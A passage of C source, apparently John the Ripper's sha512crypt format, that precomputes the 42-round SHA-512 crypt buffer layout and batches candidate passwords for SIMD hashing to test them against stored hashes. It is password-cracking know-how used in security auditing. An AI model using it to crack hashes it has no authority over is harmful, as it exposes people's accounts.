#define MAX_KEYS_PER_CRYPT (SIMD_COEF_64*SIMD_PARA_SHA512)
#if ARCH_LITTLE_ENDIAN==1
#define GETPOS(i, index) ( (index&(SIMD_COEF_64-1))*8 + ((i)&(0xffffffff-7))*SIMD_COEF_64 + (7-((i)&7)) + (unsigned int)index/SIMD_COEF_64*SHA_BUF_SIZ*SIMD_COEF_64*8 )
#else
#define GETPOS(i, index) ( (index&(SIMD_COEF_64-1))*8 + ((i)&(0xffffffff-7))*SIMD_COEF_64 + ((i)&7) + (unsigned int)index/SIMD_COEF_64*SHA_BUF_SIZ*SIMD_COEF_64*8 )
#endif
#else
#define MIN_KEYS_PER_CRYPT 1
#define MAX_KEYS_PER_CRYPT 1
#endif
// these MUST be defined prior to loading cryptsha512_valid.h
#define BINARY_SIZE 64
#define SALT_LENGTH 16
#define CIPHERTEXT_LENGTH 86
#define __CRYPTSHA512_CREATE_PROPER_TESTS_ARRAY__
#include "cryptsha512_common.h"
#define BLKS MAX_KEYS_PER_CRYPT
/* This structure is 'pre-loaded' with the keyspace of all possible crypts which */
/* will be performed WITHIN the inner loop. There are 8 possible buffers that */
/* are used. They are cp, pspc, cspp, ppc, cpp, psc, csp, and pc, where p stands */
/* for the 'hash' built from the password (and it is the same length as the */
/* password), s stands for the hash built from the salt (same size as salt), and */
/* c stands for the crypt results from the prior loop. There are 8 possible */
/* buffer layouts listed, but they fall into a pattern that is 42 long (2*3*7) */
/* this structure encapsulates this. we build this buffer, after computing the */
/* s hash, the p hash, and the starting c values. Then, within the inner loop, */
/* we simply spin through this structure, calling the SHA512 code to do the work. */
/* NOTE, most of the time, there will be 1 block and 2 block crypts. As the */
/* password length grows, there are more 2 block crypts, and thus it is slower */
/**/
/* for SSE only, but 'could' be done for sha2.c code (jtr sha2) */
/* This keyspace was changed, to be put into BE at the start, and then we never */
/* do any swapping, but keep it in BE format from that point on. To do this, we */
/* changed the pointers to be a pointer to the start of the block, AND an offset */
/* for SSE, we need a pointer to the start of the block[0], and the offset. The */
/* index needed will be known in the crypt_all. This means we need something */
/* similar to out GET_POS macros, but also for oSSL formats. */
/* To do this, we have to use the JtR sha2.c functions, since there is this func: */
/* sha512_hash_block(&CTX, data, int perform_endian_swap). So if we set the last */
/* param to 0, we can call this function, and it will avoid the byte swapping */
typedef struct cryptloopstruct_t {
	unsigned char buf[8*2*128*BLKS];	// originally sized to hold 42 2-block buffers (42*2*128); reduced to only the 8 unique ones (8*2*128)
// now, the cryptstructs are on the stack within the crypt for loop, so we avoid allocation.
// and to avoid the single static variable, or a static array.
unsigned char *bufs[BLKS][42]; // points to the start of each 2 block buffer.
#ifdef SIMD_COEF_64
int offs[BLKS][42];
#endif
unsigned char *cptr[BLKS][42]; // points to where we copy the crypt pointer for next round.
// Round 0 points to somewhere in round 1's buffer, etc.
int datlen[42]; // if 1, then this is a small, only 1 block crypt. Some rounds for shorter passwords take only 1 crypt block.
// NOTE, datlen could be changed to a number, and then we could do > 2 block crypts. Would take a little
// more memory (and longer PW's certainly DO take more time), but it should work fine. It may be an issue
// especially when doing OMP, that the memory footprint of this 'hot' inner loop simply gets too big, and
// things slow down. For now, we are limiting ourselves to 35 byte password, which fits into 2 SHA512 buffers
} cryptloopstruct;
static int (*saved_len);
static char (*saved_key)[PLAINTEXT_LENGTH + 1];
static uint32_t (*crypt_out)[BINARY_SIZE / sizeof(uint32_t)];
/* these 2 values are used in setup of the cryptloopstruct, AND to do our SHA512_Init() calls, in the inner loop */
static const unsigned char padding[256] = { 0x80, 0 /* 0,0,0,0.... */ };
#if !defined(JTR_INC_COMMON_CRYPTO_SHA2) && !defined (SIMD_COEF_64)
static const uint64_t ctx_init[8] =
{0x6A09E667F3BCC908ULL,0xBB67AE8584CAA73BULL,0x3C6EF372FE94F82BULL,0xA54FF53A5F1D36F1ULL,0x510E527FADE682D1ULL,0x9B05688C2B3E6C1FULL,0x1F83D9ABFB41BD6BULL,0x5BE0CD19137E2179ULL};
#endif
static struct saltstruct {
unsigned int len;
unsigned int rounds;
unsigned char salt[SALT_LENGTH];
} *cur_salt;
static void init(struct fmt_main *self)
{
int omp_t = 1;
int max_crypts;
#ifdef _OPENMP
omp_t = omp_get_max_threads();
omp_t *= OMP_SCALE;
#endif
max_crypts = SIMD_COEF_SCALE * omp_t * MAX_KEYS_PER_CRYPT;
self->params.max_keys_per_crypt = max_crypts;
// we allocate 1 more than needed, and use that 'extra' value as a zero
// length PW to fill in the tail groups in MMX mode.
saved_len = mem_calloc(1 + max_crypts, sizeof(*saved_len));
saved_key = mem_calloc(1 + max_crypts, sizeof(*saved_key));
crypt_out = mem_calloc(1 + max_crypts, sizeof(*crypt_out));
}
static void done(void)
{
MEM_FREE(crypt_out);
MEM_FREE(saved_key);
MEM_FREE(saved_len);
}
#define COMMON_GET_HASH_VAR crypt_out
#include "common-get-hash.h"
static void set_key(char *key, int index)
{
saved_len[index] = strnzcpyn(saved_key[index], key, sizeof(*saved_key));
}
static char *get_key(int index)
{
saved_key[index][saved_len[index]] = 0;
return saved_key[index];
}
/*
These are the 8 types of buffers this algorithm uses:
cp
pspc
cspp
ppc
cpp
psc
csp
pc
*/
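/*
 The 42-entry cycle built below follows Drepper's spec: round i starts with
 the previous crypt result when i is even, otherwise with the password; the
 salt is mixed in except when i % 3 == 0, an extra password copy except when
 i % 7 == 0, and the round ends with whichever of password/crypt did not
 start it. Since lcm(2,3,7) == 42, the layout repeats every 42 rounds, which
 is why the whole cycle can be precomputed once in LoadCryptStruct() below.
*/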
static void LoadCryptStruct(cryptloopstruct *crypt_struct, int index, int idx, char *p_bytes, char *s_bytes) {
unsigned len_pc, len_ppsc, len_ppc, len_psc; // length of 'data'
unsigned tot_pc, tot_ppsc, tot_ppc, tot_psc; // length of entire block to crypt (128 or 256)
unsigned off_pc, off_pspc, off_ppc, off_psc; // offset to the crypt ptr for these 4 'types'.
	unsigned dlen_pc, dlen_ppsc, dlen_ppc, dlen_psc;	// is this 1 or 2 blocks (or the actual length for CommonCrypto, since it uses SHA512_Final())
unsigned plen=saved_len[index];
unsigned char *cp = crypt_struct->buf;
cryptloopstruct *pstr = crypt_struct;
#ifdef SIMD_COEF_64
// in SSE mode, we FORCE every buffer to be 2 blocks, even if it COULD fit into 1.
// Then we simply use the 2 block SSE code.
unsigned char *next_cp;
cp += idx*2*128;
#endif
len_pc = plen + BINARY_SIZE;
len_ppsc = (plen<<1) + cur_salt->len + BINARY_SIZE;
len_ppc = (plen<<1) + BINARY_SIZE;
len_psc = plen + cur_salt->len + BINARY_SIZE;
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
if (len_pc <=111) tot_pc =128; else tot_pc =256;
if (len_ppsc<=111) tot_ppsc=128; else tot_ppsc=256;
if (len_ppc <=111) tot_ppc =128; else tot_ppc =256;
if (len_psc <=111) tot_psc =128; else tot_psc =256;
dlen_pc =len_pc;
dlen_ppsc=len_ppsc;
dlen_ppc =len_ppc;
dlen_psc =len_psc;
#else
if (len_pc <=111) {tot_pc =128; dlen_pc =128;}else{tot_pc =256; dlen_pc =256; }
if (len_ppsc<=111) {tot_ppsc=128; dlen_ppsc=128;}else{tot_ppsc=256; dlen_ppsc=256; }
if (len_ppc <=111) {tot_ppc =128; dlen_ppc =128;}else{tot_ppc =256; dlen_ppc =256; }
if (len_psc <=111) {tot_psc =128; dlen_psc =128;}else{tot_psc =256; dlen_psc =256; }
#endif
off_pc = len_pc - BINARY_SIZE;
off_pspc = len_ppsc - BINARY_SIZE;
off_ppc = len_ppc - BINARY_SIZE;
off_psc = len_psc - BINARY_SIZE;
// Adjust cp for idx;
#ifdef SIMD_COEF_64
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[0] is a cp (First of this type)
pstr->bufs[idx][0] = pstr->cptr[idx][41] = cp;
	// For the first element only, we DO copy in the c value.
memcpy(cp, crypt_out[index], BINARY_SIZE); cp += BINARY_SIZE;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[0] = dlen_pc;
memcpy(cp, padding, tot_pc-2-len_pc); cp += (tot_pc-len_pc);
pstr->bufs[idx][0][tot_pc-2] = (len_pc<<3)>>8;
pstr->bufs[idx][0][tot_pc-1] = (len_pc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[1] is a pspc (First of this type)
pstr->bufs[idx][1] = cp;
pstr->cptr[idx][0] = cp + off_pspc;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, s_bytes, cur_salt->len); cp += cur_salt->len;
memcpy(cp, p_bytes, plen); cp += (plen+BINARY_SIZE);
if (!idx) pstr->datlen[1] = dlen_ppsc;
memcpy(cp, padding, tot_ppsc-2-len_ppsc); cp += (tot_ppsc-len_ppsc);
pstr->bufs[idx][1][tot_ppsc-2] = (len_ppsc<<3)>>8;
pstr->bufs[idx][1][tot_ppsc-1] = (len_ppsc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[2] is a cspp (First of this type)
pstr->bufs[idx][2] = pstr->cptr[idx][1] = cp;
cp += BINARY_SIZE;
memcpy(cp, s_bytes, cur_salt->len); cp += cur_salt->len;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[2] = dlen_ppsc;
memcpy(cp, padding, tot_ppsc-2-len_ppsc); cp += (tot_ppsc-len_ppsc);
pstr->bufs[idx][2][tot_ppsc-2] = (len_ppsc<<3)>>8;
pstr->bufs[idx][2][tot_ppsc-1] = (len_ppsc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[3] is a ppc (First of this type)
pstr->bufs[idx][3] = cp;
pstr->cptr[idx][2] = cp + off_ppc;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, p_bytes, plen); cp +=(plen+BINARY_SIZE);
if (!idx) pstr->datlen[3] = dlen_ppc;
memcpy(cp, padding, tot_ppc-2-len_ppc); cp += (tot_ppc-len_ppc);
pstr->bufs[idx][3][tot_ppc-2] = (len_ppc<<3)>>8;
pstr->bufs[idx][3][tot_ppc-1] = (len_ppc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[4] is a cspp (from 2)
pstr->bufs[idx][4] = pstr->cptr[idx][3] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[4] = dlen_ppsc;
// pstr->buf[5] is a pspc (from [1])
pstr->bufs[idx][5] = pstr->bufs[idx][1]; pstr->cptr[idx][4] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[5] = dlen_ppsc;
// pstr->buf[6] is a cpp (First of this type)
pstr->bufs[idx][6] = pstr->cptr[idx][5] = cp;
cp += BINARY_SIZE;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[6] = dlen_ppc;
memcpy(cp, padding, tot_ppc-2-len_ppc); cp += (tot_ppc-len_ppc);
pstr->bufs[idx][6][tot_ppc-2] = (len_ppc<<3)>>8;
pstr->bufs[idx][6][tot_ppc-1] = (len_ppc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[07] psc (First of this type)
pstr->bufs[idx][7] = cp;
pstr->cptr[idx][6] = cp + off_psc;
memcpy(cp, p_bytes, plen); cp += plen;
memcpy(cp, s_bytes, cur_salt->len); cp += (cur_salt->len+BINARY_SIZE);
if (!idx) pstr->datlen[7] = dlen_psc;
memcpy(cp, padding, tot_psc-2-len_psc); cp += (tot_psc-len_psc);
pstr->bufs[idx][7][tot_psc-2] = (len_psc<<3)>>8;
pstr->bufs[idx][7][tot_psc-1] = (len_psc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[08] cspp (from 2)
pstr->bufs[idx][8] = pstr->cptr[idx][7] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[8] = dlen_ppsc;
// pstr->buf[09] ppc (from 3)
pstr->bufs[idx][9] = pstr->bufs[idx][3]; pstr->cptr[idx][8] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[9] = dlen_ppc;
// pstr->buf[10] cspp (from 2)
pstr->bufs[idx][10] = pstr->cptr[idx][9] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[10] = dlen_ppsc;
// pstr->buf[11] pspc (from 1)
pstr->bufs[idx][11] = pstr->bufs[idx][1]; pstr->cptr[idx][10] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[11] = dlen_ppsc;
// pstr->buf[12] cpp (from 6)
pstr->bufs[idx][12] = pstr->cptr[idx][11] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[12] = dlen_ppc;
// pstr->buf[13] pspc (from 1)
pstr->bufs[idx][13] = pstr->bufs[idx][1]; pstr->cptr[idx][12] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[13] = dlen_ppsc;
// pstr->buf[14] csp (First of this type)
pstr->bufs[idx][14] = pstr->cptr[idx][13] = cp;
cp += BINARY_SIZE;
memcpy(cp, s_bytes, cur_salt->len); cp += cur_salt->len;
memcpy(cp, p_bytes, plen); cp += plen;
if (!idx) pstr->datlen[14] = dlen_psc;
memcpy(cp, padding, tot_psc-2-len_psc); cp += (tot_psc-len_psc);
pstr->bufs[idx][14][tot_psc-2] = (len_psc<<3)>>8;
pstr->bufs[idx][14][tot_psc-1] = (len_psc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[15] ppc (from 3)
pstr->bufs[idx][15] = pstr->bufs[idx][3]; pstr->cptr[idx][14] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[15] = dlen_ppc;
// pstr->buf[16] cspp (from 2)
pstr->bufs[idx][16] = pstr->cptr[idx][15] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[16] = dlen_ppsc;
// pstr->buf[17] pspc (from 1)
pstr->bufs[idx][17] = pstr->bufs[idx][1]; pstr->cptr[idx][16] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[17] = dlen_ppsc;
// pstr->buf[18] cpp (from 6)
pstr->bufs[idx][18] = pstr->cptr[idx][17] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[18] = dlen_ppc;
// pstr->buf[19] pspc (from 1)
pstr->bufs[idx][19] = pstr->bufs[idx][1]; pstr->cptr[idx][18] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[19] = dlen_ppsc;
// pstr->buf[20] cspp (from 2)
pstr->bufs[idx][20] = pstr->cptr[idx][19] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[20] = dlen_ppsc;
// pstr->buf[21] pc (First of this type)
pstr->bufs[idx][21] = cp;
pstr->cptr[idx][20] = cp + off_pc;
memcpy(cp, p_bytes, plen); cp += (plen+BINARY_SIZE);
if (!idx) pstr->datlen[21] = dlen_pc;
	memcpy(cp, padding, tot_pc-2-len_pc);
pstr->bufs[idx][21][tot_pc-2] = (len_pc<<3)>>8;
pstr->bufs[idx][21][tot_pc-1] = (len_pc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[22] cspp (from 2)
pstr->bufs[idx][22] = pstr->cptr[idx][21] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[22] = dlen_ppsc;
// pstr->buf[23] pspc (from 1)
pstr->bufs[idx][23] = pstr->bufs[idx][1]; pstr->cptr[idx][22] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[23] = dlen_ppsc;
// pstr->buf[24] cpp (from 6)
pstr->bufs[idx][24] = pstr->cptr[idx][23] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[24] = dlen_ppc;
// pstr->buf[25] pspc (from 1)
pstr->bufs[idx][25] = pstr->bufs[idx][1]; pstr->cptr[idx][24] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[25] = dlen_ppsc;
// pstr->buf[26] cspp (from 2)
pstr->bufs[idx][26] = pstr->cptr[idx][25] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[26] = dlen_ppsc;
// pstr->buf[27] ppc (from 3)
pstr->bufs[idx][27] = pstr->bufs[idx][3]; pstr->cptr[idx][26] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[27] = dlen_ppc;
// pstr->buf[28] csp (from 14)
pstr->bufs[idx][28] = pstr->cptr[idx][27] = pstr->bufs[idx][14];
if (!idx) pstr->datlen[28] = dlen_psc;
// pstr->buf[29] pspc (from 1)
pstr->bufs[idx][29] = pstr->bufs[idx][1]; pstr->cptr[idx][28] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[29] = dlen_ppsc;
// pstr->buf[30] cpp (from 6)
pstr->bufs[idx][30] = pstr->cptr[idx][29] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[30] = dlen_ppc;
// pstr->buf[31] pspc (from 1)
pstr->bufs[idx][31] = pstr->bufs[idx][1]; pstr->cptr[idx][30] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[31] = dlen_ppsc;
// pstr->buf[32] cspp (from 2)
pstr->bufs[idx][32] = pstr->cptr[idx][31] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[32] = dlen_ppsc;
// pstr->buf[33] ppc (from 3)
pstr->bufs[idx][33] = pstr->bufs[idx][3]; pstr->cptr[idx][32] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[33] = dlen_ppc;
// pstr->buf[34] cspp (from 2)
pstr->bufs[idx][34] = pstr->cptr[idx][33] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[34] = dlen_ppsc;
// pstr->buf[35] psc (from 7)
pstr->bufs[idx][35] = pstr->bufs[idx][7]; pstr->cptr[idx][34] = pstr->cptr[idx][6];
if (!idx) pstr->datlen[35] = dlen_psc;
// pstr->buf[36] cpp (from 6)
pstr->bufs[idx][36] = pstr->cptr[idx][35] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[36] = dlen_ppc;
// pstr->buf[37] pspc (from 1)
pstr->bufs[idx][37] = pstr->bufs[idx][1]; pstr->cptr[idx][36] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[37] = dlen_ppsc;
// pstr->buf[38] cspp (from 2)
pstr->bufs[idx][38] = pstr->cptr[idx][37] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[38] = dlen_ppsc;
// pstr->buf[39] ppc (from 3)
pstr->bufs[idx][39] = pstr->bufs[idx][3]; pstr->cptr[idx][38] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[39] = dlen_ppc;
// pstr->buf[40] cspp (from 2)
pstr->bufs[idx][40] = pstr->cptr[idx][39] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[40] = dlen_ppsc;
// pstr->buf[41] pspc (from 1)
pstr->bufs[idx][41] = pstr->bufs[idx][1]; pstr->cptr[idx][40] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[41] = dlen_ppsc;
}
static int crypt_all(int *pcount, struct db_salt *salt)
{
const int count = *pcount;
int index = 0;
int *MixOrder, tot_todo;
#ifdef SIMD_COEF_64
// group based upon size splits.
MixOrder = mem_calloc((count+6*MAX_KEYS_PER_CRYPT), sizeof(int));
{
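		// lens[saltlen][g] .. lens[saltlen][g+1] bound the password
		// lengths whose 8 buffer types all need the same number of
		// SHA512 blocks (see the table in the header comment), so only
		// passwords from one such group may share a SIMD bundle.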
static const int lens[17][6] = {
{0,24,48,88,89,90}, // 0 byte salt
{0,24,48,88,89,90}, // 1 byte salt
{0,23,24,46,48,87}, // 2 byte salt
{0,23,24,45,48,87}, // 3 byte salt
{0,22,24,44,48,86}, // 4 byte salt
{0,22,24,43,48,86}, // 5 byte salt
{0,21,24,42,48,85}, // 6 byte salt
{0,21,24,41,48,85}, // 7 byte salt
{0,20,24,40,48,84}, // 8 byte salt
{0,20,24,39,48,84}, // 9 byte salt
{0,19,24,38,48,83}, // 10 byte salt
{0,19,24,37,48,83}, // 11 byte salt
{0,18,24,36,48,82}, // 12 byte salt
{0,18,24,35,48,82}, // 13 byte salt
{0,17,24,34,48,81}, // 14 byte salt
{0,17,24,33,48,81}, // 15 byte salt
{0,16,24,32,48,80} };
int j;
tot_todo = 0;
saved_len[count] = 0; // point all 'tail' MMX buffer elements to this location.
for (j = 0; j < 5; ++j) {
for (index = 0; index < count; ++index) {
if (saved_len[index] >= lens[cur_salt->len][j] && saved_len[index] < lens[cur_salt->len][j+1])
MixOrder[tot_todo++] = index;
}
while (tot_todo % MAX_KEYS_PER_CRYPT)
MixOrder[tot_todo++] = count;
}
}
#else
// no need to mix. just run them one after the next, in any order.
MixOrder = mem_calloc(count, sizeof(int));
for (index = 0; index < count; ++index)
MixOrder[index] = index;
tot_todo = count;
#endif
#ifdef _OPENMP
#pragma omp parallel for
#endif
for (index = 0; index < tot_todo; index += MAX_KEYS_PER_CRYPT)
{
		// portably align the temp_result char * pointer to machine word size.
union xx {
unsigned char c[BINARY_SIZE];
ARCH_WORD a[BINARY_SIZE/sizeof(ARCH_WORD)];
} u;
unsigned char *temp_result = u.c;
SHA512_CTX ctx;
SHA512_CTX alt_ctx;
size_t cnt;
int idx;
char *cp;
char p_bytes[PLAINTEXT_LENGTH+1];
char s_bytes[PLAINTEXT_LENGTH+1];
char tmp_cls[sizeof(cryptloopstruct)+MEM_ALIGN_SIMD];
cryptloopstruct *crypt_struct;
#ifdef SIMD_COEF_64
char tmp_sse_out[8*MAX_KEYS_PER_CRYPT*8+MEM_ALIGN_SIMD];
uint64_t *sse_out;
sse_out = (uint64_t *)mem_align(tmp_sse_out, MEM_ALIGN_SIMD);
#endif
crypt_struct = (cryptloopstruct *)mem_align(tmp_cls,MEM_ALIGN_SIMD);
for (idx = 0; idx < MAX_KEYS_PER_CRYPT; ++idx)
{
/* Prepare for the real work. */
SHA512_Init(&ctx);
/* Add the key string. */
SHA512_Update(&ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* The last part is the salt string. This must be at most 16
characters and it ends at the first `$' character (for
compatibility with existing implementations). */
SHA512_Update(&ctx, cur_salt->salt, cur_salt->len);
/* Compute alternate SHA512 sum with input KEY, SALT, and KEY. The
final result will be added to the first context. */
SHA512_Init(&alt_ctx);
/* Add key. */
SHA512_Update(&alt_ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Add salt. */
SHA512_Update(&alt_ctx, cur_salt->salt, cur_salt->len);
/* Add key again. */
SHA512_Update(&alt_ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Now get result of this (64 bytes) and add it to the other
context. */
SHA512_Final((unsigned char*)crypt_out[MixOrder[index+idx]], &alt_ctx);
/* Add for any character in the key one byte of the alternate sum. */
for (cnt = saved_len[MixOrder[index+idx]]; cnt > BINARY_SIZE; cnt -= BINARY_SIZE)
SHA512_Update(&ctx, (unsigned char*)crypt_out[MixOrder[index+idx]], BINARY_SIZE);
SHA512_Update(&ctx, (unsigned char*)crypt_out[MixOrder[index+idx]], cnt);
/* Take the binary representation of the length of the key and for every
1 add the alternate sum, for every 0 the key. */
for (cnt = saved_len[MixOrder[index+idx]]; cnt > 0; cnt >>= 1)
if ((cnt & 1) != 0)
SHA512_Update(&ctx, (unsigned char*)crypt_out[MixOrder[index+idx]], BINARY_SIZE);
else
SHA512_Update(&ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Create intermediate result. */
SHA512_Final((unsigned char*)crypt_out[MixOrder[index+idx]], &ctx);
/* Start computation of P byte sequence. */
SHA512_Init(&alt_ctx);
/* For every character in the password add the entire password. */
for (cnt = 0; cnt < saved_len[MixOrder[index+idx]]; ++cnt)
SHA512_Update(&alt_ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Finish the digest. */
SHA512_Final(temp_result, &alt_ctx);
/* Create byte sequence P. */
cp = p_bytes;
for (cnt = saved_len[MixOrder[index+idx]]; cnt >= BINARY_SIZE; cnt -= BINARY_SIZE)
cp = (char *) memcpy (cp, temp_result, BINARY_SIZE) + BINARY_SIZE;
memcpy (cp, temp_result, cnt);
/* Start computation of S byte sequence. */
SHA512_Init(&alt_ctx);
/* repeat the following 16+A[0] times, where A[0] represents the
first byte in digest A interpreted as an 8-bit unsigned value */
for (cnt = 0; cnt < 16 + ((unsigned char*)crypt_out[MixOrder[index+idx]])[0]; ++cnt)
SHA512_Update(&alt_ctx, cur_salt->salt, cur_salt->len);
/* Finish the digest. */
SHA512_Final(temp_result, &alt_ctx);
/* Create byte sequence S. */
cp = s_bytes;
for (cnt = cur_salt->len; cnt >= BINARY_SIZE; cnt -= BINARY_SIZE)
cp = (char *) memcpy (cp, temp_result, BINARY_SIZE) + BINARY_SIZE;
memcpy (cp, temp_result, cnt);
/* Repeatedly run the collected hash value through SHA512 to
burn CPU cycles. */
LoadCryptStruct(crypt_struct, MixOrder[index+idx], idx, p_bytes, s_bytes);
}
idx = 0;
#ifdef SIMD_COEF_64
for (cnt = 1; ; ++cnt) {
if (crypt_struct->datlen[idx]==256) {
unsigned char *cp = crypt_struct->bufs[0][idx];
SIMDSHA512body((__m128i *)cp, sse_out, NULL, SSEi_FLAT_IN|SSEi_2BUF_INPUT_FIRST_BLK);
SIMDSHA512body((__m128i *)&cp[128], sse_out, sse_out, SSEi_FLAT_IN|SSEi_2BUF_INPUT_FIRST_BLK|SSEi_RELOAD);
} else {
unsigned char *cp = crypt_struct->bufs[0][idx];
SIMDSHA512body((__m128i *)cp, sse_out, NULL, SSEi_FLAT_IN|SSEi_2BUF_INPUT_FIRST_BLK);
}
if (cnt == cur_salt->rounds)
break;
{
int j, k;
for (k = 0; k < MAX_KEYS_PER_CRYPT; ++k) {
uint64_t *o = (uint64_t *)crypt_struct->cptr[k][idx];
#if !ARCH_ALLOWS_UNALIGNED
if (!is_aligned(o, 8)) {
unsigned char *cp = (unsigned char*)o;
for (j = 0; j < 64; ++j)
*cp++ = ((unsigned char*)sse_out)[GETPOS(j, k)];
} else
#endif
for (j = 0; j < 8; ++j)
#if ARCH_LITTLE_ENDIAN==1
*o++ = JOHNSWAP64(sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64]);
#else
*o++ = sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64];
#endif
}
}
if (++idx == 42)
idx = 0;
}
{
int j, k;
for (k = 0; k < MAX_KEYS_PER_CRYPT; ++k) {
uint64_t *o = (uint64_t *)crypt_out[MixOrder[index+k]];
for (j = 0; j < 8; ++j)
#if ARCH_LITTLE_ENDIAN==1
*o++ = JOHNSWAP64(sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64]);
#else
*o++ = sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64];
#endif
}
}
#else
SHA512_Init(&ctx);
for (cnt = 1; ; ++cnt) {
// calling with 128 byte, or 256 byte always, will force the update to properly crypt the data.
		// NOTE the data is fully formed. It ends in a 0x80, is padded with nulls, AND has the bit length appended.
SHA512_Update(&ctx, crypt_struct->bufs[0][idx], crypt_struct->datlen[idx]);
if (cnt == cur_salt->rounds)
break;
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
SHA512_Final(crypt_struct->cptr[0][idx], &ctx);
#else // !defined JTR_INC_COMMON_CRYPTO_SHA2, so it is oSSL, or generic
#if ARCH_LITTLE_ENDIAN
{
int j;
uint64_t *o = (uint64_t *)crypt_struct->cptr[0][idx];
for (j = 0; j < 8; ++j)
*o++ = JOHNSWAP64(ctx.h[j]);
}
#else
memcpy(crypt_struct->cptr[0][idx], ctx.h, BINARY_SIZE);
#endif
#endif
if (++idx == 42)
idx = 0;
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
SHA512_Init(&ctx);
#else
// this memcpy is 'good enough', used instead of SHA512_Init()
memcpy(ctx.h, ctx_init, sizeof(ctx_init));
#endif
}
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
SHA512_Final((unsigned char*)crypt_out[MixOrder[index]], &ctx);
#else
#if ARCH_LITTLE_ENDIAN
{
int j;
uint64_t *o = (uint64_t *)crypt_out[MixOrder[index]];
for (j = 0; j < 8; ++j)
*o++ = JOHNSWAP64(ctx.h[j]);
}
#else
memcpy(crypt_out[MixOrder[index]], ctx.h, BINARY_SIZE);
#endif
#endif
#endif
}
MEM_FREE(MixOrder);
return count;
}
static void set_salt(void *salt)
{
cur_salt = salt;
}
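/* For illustration (hypothetical input, standard sha512crypt layout per
 * Drepper's spec referenced at the top): a ciphertext of
 * "$6$rounds=10000$mysalt$..." parses to rounds = 10000 and salt = "mysalt"
 * (len 6); without a rounds= prefix, ROUNDS_DEFAULT is kept. */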
static void *get_salt(char *ciphertext)
{
static struct saltstruct out;
int len;
memset(&out, 0, sizeof(out));
out.rounds = ROUNDS_DEFAULT;
ciphertext += FORMAT_TAG_LEN;
if (!strncmp(ciphertext, ROUNDS_PREFIX,
sizeof(ROUNDS_PREFIX) - 1)) {
const char *num = ciphertext + sizeof(ROUNDS_PREFIX) - 1;
char *endp;
unsigned long int srounds = strtoul(num, &endp, 10);
if (*endp == '$')
{
ciphertext = endp + 1;
srounds = srounds < ROUNDS_MIN ?
ROUNDS_MIN : srounds;
